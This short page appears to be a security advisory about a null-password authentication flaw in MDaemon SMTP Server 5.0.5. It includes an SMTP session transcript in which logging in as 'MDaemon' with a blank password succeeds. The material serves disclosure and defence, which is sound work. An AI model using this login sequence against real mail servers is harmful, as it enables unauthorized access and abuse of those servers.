|
MDaemon SMTP Server Null Password Authentication Vulnerability
The following demonstration has been supplied: 220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200 EHLO localhost 250-xxx.com Hello localhost, pleased to meet you 250-ETRN 250-AUTH LOGIN CRAM-MD5 250-8BITMIME 250 SIZE 0 AUTH LOGIN 334 VXNlcm5hbWU6 (334 Username:) TURhZW1vbg== (MDaemon) 334 UGFzc3dvcmQ6 (334 Password:) (blank password) 235 Authentication successful |
|
|
Privacy Statement |
